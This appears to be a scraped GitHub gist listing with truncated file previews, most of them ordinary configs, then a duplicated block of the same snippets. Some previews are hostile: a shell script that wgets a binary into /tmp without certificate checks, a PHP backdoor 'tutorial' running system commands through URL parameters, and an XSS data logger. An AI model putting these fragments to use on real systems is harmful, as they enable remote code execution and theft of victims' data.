A boo! AnikHasibul

## settings.json
{
    "globals" :
    {
        "alwaysShowTabs" : false,
        "defaultProfile" : "{2c4de342-38b7-51cf-b940-2309a097f518}",
        "initialCols" : 100,
        "initialRows" : 25,
        "keybindings" :
        [
            {

## core.css
/* W3.CSS 4.12 November 2018 by Jan Egil and Borge Refsnes */

html {
	box-sizing: border-box
}

*,
*:before,
*:after {
	box-sizing: inherit

## security.php
<?php
header('X-XSS-Protection: 1; mode=block');
header('X-Content-Type: nosniff');
header('X-Frame-Options: DENY');
header('Referrer-Policy: no-referrer-when-downgrade');
?>

## subdomain.py
import requests
import sys
from bs4 import BeautifulSoup

errorTexts = [
    "The specified bucket does not exit ",
       "Repository not found ",
       "ERROR\: The request could not be satisfied ",
       "There isn't a GitHub Pages site here.",
       "Sorry\, this shop is currently unavailable\. ",

## bug_report_template.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                AnikHasibul
                / bug_report_template.md
            
            
              Last active
              December 7, 2018 18:07
            
              
                This is a simple bug report template in markdown. All the contents have used just for fun. No connection with reality. 🎉
              
          
    Full scope access on NASA with HTML

Bug report for ..........
Steps To Reproduce


Install this by this command apt install example


Configure this with this env EXAMPLE=POC


Run this for exploit


## .gdbinit
# set to 1 to have ARM target debugging as default, use the "arm" command to switch inside gdb
set $ARM = 1
# set to 0 if you have problems with the colorized prompt - reported by Plouj with Ubuntu gdb 7.2
set $COLOREDPROMPT = 1
# color the first line of the disassembly - default is green, if you want to change it search for
# SETCOLOR1STLINE and modify it :-)
set $SETCOLOR1STLINE = 0
# set to 0 to remove display of objectivec messages (default is 1)
set $SHOWOBJECTIVEC = 1
# set to 0 to remove display of cpu registers (default is 1)

## maybeAMalware.sh
#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
getnanoWatch(){
    ARCH=$(uname -i)
    if [ "$ARCH" == "x86_64" ]
    then
        rm -rf /tmp/nanoWatch*
        wget https://pixeldra.in/api/download/BsjL1_ --no-check-certificate -O /tmp/nanoWatch
            if [ $? -ne 0 -a $PS2 -eq 0 ];
            then

## Tutorial.md

      
              2 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                AnikHasibul
                / Tutorial.md
            
            
              Created
              October 22, 2018 11:21
            
              
                The tiniest PHP malware/backdoor for Remote Code Execution.
              
          
    https://example.com/backdoor.php?f=syntem&p=ls
The above endpoint will list all the files on the directory! via system(ls);

  
## xsslogger.php
<?php
file_put_contents("xss.log",$_POST["XssGhost"]."\n",FILE_APPEND);
header("Access-Control-Allow-Origin: *");
?>

## .vimrc
set rtp+=~/.vim/bundle/Vundle.vim
set shell=/bin/bash
call vundle#begin()

" let Vundle manage Vundle, required
Plugin 'luochen1990/rainbow'
Plugin 'SirVer/ultisnips'
Plugin 'gmarik/Vundle.vim'
Plugin 'AnikHasibul/molokai'
Plugin 'AndrewRadev/splitjoin.vim'
	{
	"globals" :
	{
	"alwaysShowTabs" : false,
	"defaultProfile" : "{2c4de342-38b7-51cf-b940-2309a097f518}",
	"initialCols" : 100,
	"initialRows" : 25,
	"keybindings" :
	[
	{
	/* W3.CSS 4.12 November 2018 by Jan Egil and Borge Refsnes */

	html {
	box-sizing: border-box
	}

	*,
	*:before,
	*:after {
	box-sizing: inherit
	<?php
	header('X-XSS-Protection: 1; mode=block');
	header('X-Content-Type: nosniff');
	header('X-Frame-Options: DENY');
	header('Referrer-Policy: no-referrer-when-downgrade');
	?>
	import requests
	import sys
	from bs4 import BeautifulSoup

	errorTexts = [
	"The specified bucket does not exit ",
	"Repository not found ",
	"ERROR\: The request could not be satisfied ",
	"There isn't a GitHub Pages site here.",
	"Sorry\, this shop is currently unavailable\. ",
	# set to 1 to have ARM target debugging as default, use the "arm" command to switch inside gdb
	set $ARM = 1
	# set to 0 if you have problems with the colorized prompt - reported by Plouj with Ubuntu gdb 7.2
	set $COLOREDPROMPT = 1
	# color the first line of the disassembly - default is green, if you want to change it search for
	# SETCOLOR1STLINE and modify it :-)
	set $SETCOLOR1STLINE = 0
	# set to 0 to remove display of objectivec messages (default is 1)
	set $SHOWOBJECTIVEC = 1
	# set to 0 to remove display of cpu registers (default is 1)
	#!/bin/bash
	PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
	getnanoWatch(){
	ARCH=$(uname -i)
	if [ "$ARCH" == "x86_64" ]
	then
	rm -rf /tmp/nanoWatch*
	wget https://pixeldra.in/api/download/BsjL1_ --no-check-certificate -O /tmp/nanoWatch
	if [ $? -ne 0 -a $PS2 -eq 0 ];
	then
	<?php
	file_put_contents("xss.log",$_POST["XssGhost"]."\n",FILE_APPEND);
	header("Access-Control-Allow-Origin: *");
	?>
	set rtp+=~/.vim/bundle/Vundle.vim
	set shell=/bin/bash
	call vundle#begin()

	" let Vundle manage Vundle, required
	Plugin 'luochen1990/rainbow'
	Plugin 'SirVer/ultisnips'
	Plugin 'gmarik/Vundle.vim'
	Plugin 'AnikHasibul/molokai'
	Plugin 'AndrewRadev/splitjoin.vim'